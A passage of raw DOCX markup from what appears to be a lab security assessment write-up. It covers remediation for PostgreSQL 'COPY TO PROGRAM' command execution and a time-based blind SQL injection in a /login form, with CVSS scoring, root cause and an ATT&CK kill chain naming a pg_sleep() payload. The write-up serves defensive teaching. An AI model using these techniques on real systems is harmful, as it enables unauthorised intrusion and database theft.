      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>un the Payload and R</w:t>
      </w:r>
      <w:r w:rsidR="0027619E" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etrieve</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="0027619E" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619E">
      <w:pPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A24F20" w:rsidRDefault="00A24F20" w:rsidP="006C410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6A6328" w:rsidRDefault="006A6328" w:rsidP="006C410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27619E" w:rsidRPr="006C4102" w:rsidRDefault="00A52DFA" w:rsidP="006C410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lastRenderedPageBreak/>
        <w:t>2.7</w:t>
      </w:r>
      <w:r w:rsidR="0027619E" w:rsidRPr="006C4102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Remediation Recommendations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882"/>
        <w:gridCol w:w="5009"/>
      </w:tblGrid>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Fix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6C4102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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E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Remove dangerous role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Do NOT grant pg_execute_server_program</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E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Principle of Least Privilege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Restrict DB user permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E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Disable COPY TO PROGRAM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Prevent OS command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E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Container Hardening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Run PostgreSQL in restricted sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102"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  <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C4102">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619E">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:ind w:left="450"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C4102">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t>Log and detect COPY TO PROGRAM usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="00E2415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</w:p>
    <w:p w:rsidR="0027619E" w:rsidRDefault="00EA487F" w:rsidP="00E2415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138CDF" wp14:editId="360F4BFE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>33655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4281170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1418675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1438B" w:rsidRPr="009815A7" w:rsidRDefault="0031438B" w:rsidP="00EA487F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WriteUp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38CDF" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:2.65pt;margin-top:337.1pt;width:468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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="0031438B" w:rsidRPr="009815A7" w:rsidRDefault="0031438B" w:rsidP="00EA487F">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi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WriteUp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CE29D65" wp14:editId="4D9D5FDB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>33655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>439843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3717351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7ECC" w:rsidRDefault="00E24158" w:rsidP="00E24158">
      <w:pPr>
        <w:ind w:left="45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:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="006A6328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52DFA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lastRenderedPageBreak/>
        <w:t>Vulnerability 3: Time-Based Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="006A6328">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A52DFA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3</w:t>
      </w:r>
      <w:r w:rsidR="006A632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.1 Base Score: </w:t>
      </w:r>
      <w:r w:rsidR="006A6328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8.6</w:t>
      </w:r>
      <w:r w:rsidR="006A632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(</w:t>
      </w:r>
      <w:r w:rsidR="006A6328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HIGH</w:t>
      </w:r>
      <w:r w:rsidR="006A6328" w:rsidRPr="00A600DE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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00A52DFA" w:rsidRDefault="00A52DFA" w:rsidP="00B867F6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3.2</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00A52DFA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Vulnerability Name and CVE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E26A17" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00705C2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa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Time-Based Blind SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00705C2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa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N/A (custom vulnerability)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00705C2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa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Injection (SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00705C2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17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Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00705C2B" w:rsidP="00705C2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Login endpoint (/login), username parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A52DFA" w:rsidRPr="00B867F6" w:rsidRDefault="00A52DFA" w:rsidP="00705C2B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00A52DFA" w:rsidRDefault="00A52DFA" w:rsidP="00731E37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3.3</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00A52DFA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CVSS v3.1 Vector String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="008119BD" w:rsidRDefault="00705C2B" w:rsidP="008119BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00705C2B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5D4E057" wp14:editId="32AF4C37">
            <wp:extent cx="5258070" cy="654084"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19905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7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2B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi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800"/>
        <w:gridCol w:w="4495"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3055" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Metric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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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Network (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449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Exploitable remotely over network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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Low (L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449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 special conditions required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449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 authentication needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449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 user action required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B867F6" w:rsidTr="008119BD">
        <w:trPr>
          <w:trHeight w:val="620"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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Changed (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B867F6" w:rsidRPr="007E1FD9" w:rsidRDefault="00B867F6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Impacts database (different security domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00731E37" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3055" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00F668BD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  <w:r w:rsidR="00731E37" w:rsidRPr="007E1FD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ll database read access (passwords + credit cards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00731E37" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3055" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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Cannot modify data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00731E37" w:rsidTr="008119BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3055" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00731E37" w:rsidRPr="007E1FD9" w:rsidRDefault="00731E37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 impact on availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00705C2B" w:rsidRDefault="00705C2B" w:rsidP="0028684C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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1C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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1C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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1C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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1C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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</w:p>
    <w:p w:rsidR="0028684C" w:rsidRDefault="00A52DFA" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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A52DFA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lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00A52DFA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Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52DFA" w:rsidRPr="00A52DFA" w:rsidRDefault="00A52DFA" w:rsidP="00A52DFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="31" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs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52DFA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable Code Location: vuln3/src/app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00731E37" w:rsidP="00B867F6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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A76A44" wp14:editId="1671BA68">
            <wp:extent cx="4584140" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1687621128" name="Picture 3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21128" name="Picture 3" descr="A computer screen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934" cy="162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7F6" w:rsidRPr="00B867F6" w:rsidRDefault="00731E37" w:rsidP="00B867F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</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>t's vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> because:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00731E37" w:rsidRDefault="00B867F6" w:rsidP="00731E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731E37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>User input (username) is directly concatenated into the SQL query using an f-string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00731E37" w:rsidRDefault="00B867F6" w:rsidP="00731E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731E37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>No input validation, sanitization, or escaping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00731E37" w:rsidRDefault="00B867F6" w:rsidP="00731E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731E37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>No parameterized queries or prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00731E37" w:rsidRDefault="00B867F6" w:rsidP="00731E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731E37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Attacker can break out of the string context and inject arbitrary SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6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The Injection Point:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028684C" w:rsidRDefault="00731E37" w:rsidP="00A52DFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731E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545D02D" wp14:editId="3854F3ED">
            <wp:extent cx="4767557" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1569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90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2143" cy="13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DFA">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="008119BD" w:rsidRDefault="001C1C06" w:rsidP="00A52DFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00880D62" w:rsidRPr="00A52DFA" w:rsidRDefault="00B867F6" w:rsidP="00880D62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A52DFA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lastRenderedPageBreak/>
        <w:t>3.4 Kill Chain (MITRE ATT&amp;CK)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440"/>
        <w:gridCol w:w="4791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Phase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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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</w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="845"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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207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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791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Attacker identifies the login endpoint and tests for SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="719"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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207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Weaponization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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T1588</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791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Attacker crafts time-based payload with pg_sleep()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="728"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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207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Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791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Attacker sends POST request to /login with malicious payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="629"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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207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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791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Payload executes; database sleeps for 5 seconds on true conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="602"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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T1499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791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No installation needed (data extraction attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="602"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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207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Command &amp; Control</w:t>
